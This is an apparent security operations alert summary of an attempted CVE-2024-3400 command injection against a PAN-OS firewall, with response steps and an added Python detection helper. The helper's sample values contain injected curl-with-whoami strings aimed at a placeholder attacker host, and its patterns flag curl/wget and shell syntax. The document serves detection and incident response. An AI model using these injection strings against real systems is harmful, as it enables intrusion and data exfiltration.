ALERT SUMMARY
MITRE ATT&CK
T1190 Exploit Public-Facing Application
T1059 Command and Scripting Interpreter
T1059.004 Unix Shell
T1505.003 Web Shell
WHO
External attacker from IP 144.172.79.92 targeted PA-Firewall-01 at 172.16.17.139
Source IP flagged as malicious on VirusTotal
WHAT
Command injection exploit targeting Palo Alto PAN-OS vulnerability CVE-2024-3400
Malicious cookie used to inject shell command
Payload attempted to execute a curl command to an attacker-controlled server
WHEN
Apr 18 2024, 03:09 AM
WHERE
PA-Firewall-01 GlobalProtect login endpoint
/global-protect/login.esp
Device telemetry directory under /opt/panlogs/tmp/device_telemetry
WHY
Attacker attempted remote command execution via command injection vulnerability
Goal was to force firewall to curl back to attacker IP and exfiltrate system information
HOW
Malicious SESSID cookie contained directory traversal and shell injection
Cookie value included curl command with whoami execution
Logs confirm dt_send process attempted to send file using injected filename
Outbound connection observed to attacker IP 144.172.79.92
Curl execution failed due to a DNS lookup error, but the command execution attempt is confirmed
IMPACT
Confirmed exploitation attempt of PAN-OS command injection vulnerability
Firewall executed injected command
Outbound connection to malicious IP observed
High likelihood firewall compromise
ACTION TAKEN
Escalated as confirmed compromise
Recommend immediate isolation of firewall management interface
Block attacker IP at perimeter
Rotate credentials and API keys
Check for persistence mechanisms and unauthorized admin accounts
Upgrade PAN-OS to patched version
Conduct full forensic review
CVE-2024-3400 is an unauthenticated command injection flaw in PAN-OS where a crafted request allows attackers to inject shell commands that get executed as root through the device telemetry component.
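As an added example (not from the alert, the SOC, or Palo Alto Networks), the HOW section and the CVE description above expressed as a triage check: it flags SESSID cookie values and device_telemetry filenames that carry the two traits the alert describes, directory traversal and injected shell syntax. The sample values are constructed and ATTACKER-IP-PLACEHOLDER stands in for the real address.

```python
import re

# Added triage helper (not part of the alert or any Palo Alto tooling).
# Applies the HOW section as detection logic: a SESSID cookie value or a
# filename that reached /opt/panlogs/tmp/device_telemetry should never
# contain path traversal or shell syntax (backtick/$() substitution,
# command separators, or an outbound tool such as curl/wget).
INDICATORS = {
    "directory_traversal": re.compile(r"\.\.[/\\]"),
    "shell_substitution": re.compile(r"`[^`]*`|\$\([^)]*\)"),
    "shell_separator": re.compile(r"[;|&]"),
    "outbound_tool": re.compile(r"\b(?:curl|wget)\b", re.IGNORECASE),
}

# A genuine GlobalProtect session id is an opaque token; anything that does
# not fit this shape is inspected against the indicators above.
OPAQUE_TOKEN = re.compile(r"[A-Za-z0-9+/=_-]{8,128}")

def find_injection_indicators(value: str) -> list[str]:
    """Return the indicator names matched by a cookie value or filename.
    An empty list means nothing injection-like was found."""
    if OPAQUE_TOKEN.fullmatch(value):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

def scan_telemetry_names(names: list[str]) -> dict[str, list[str]]:
    """Map each suspicious device_telemetry filename to its indicators.
    The injected filename is what dt_send tried to send, so this is
    where the payload surfaces on disk and in the logs."""
    flagged = {}
    for name in names:
        hits = find_injection_indicators(name)
        if hits:
            flagged[name] = hits
    return flagged

# Constructed samples: a benign telemetry bundle name and a filename/cookie
# of the shape the alert describes (placeholder address, not the real IP).
SAMPLE_TELEMETRY_NAMES = [
    "PA_FW01_2024-04-18_03-00.tgz",
    "`curl http://ATTACKER-IP-PLACEHOLDER/$(whoami)`",
]
SUSPICIOUS_SESSID = "../../tmp/`curl http://ATTACKER-IP-PLACEHOLDER/`"

if __name__ == "__main__":
    for name, hits in scan_telemetry_names(SAMPLE_TELEMETRY_NAMES).items():
        print(f"FLAG telemetry file {name!r}: {', '.join(hits)}")
    print("SESSID indicators:", find_injection_indicators(SUSPICIOUS_SESSID))
```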